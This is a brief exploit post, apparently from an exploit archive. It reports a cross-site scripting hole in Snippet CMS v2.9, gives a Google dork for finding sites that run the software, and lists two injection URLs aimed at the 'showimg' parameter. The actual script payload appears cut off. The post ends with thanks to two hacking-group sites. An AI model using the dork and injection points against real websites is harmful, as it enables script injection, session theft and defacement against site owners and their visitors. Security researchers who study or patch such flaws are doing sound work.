Exploit Title: Snippet CMS v2.9 XSS Vulnerability Google Dork: "Powered by Snippet CMS" Date: 23.09.2011 Author: CoBRa_21 Version: 2.9 Tested on: Unix Server ------------------------------------------------------------------------------------------------------- Exploits http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="> http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="> ------------------------------------------------------------------------------------------------------- Thanks e-banka.org & cyber-warrior.org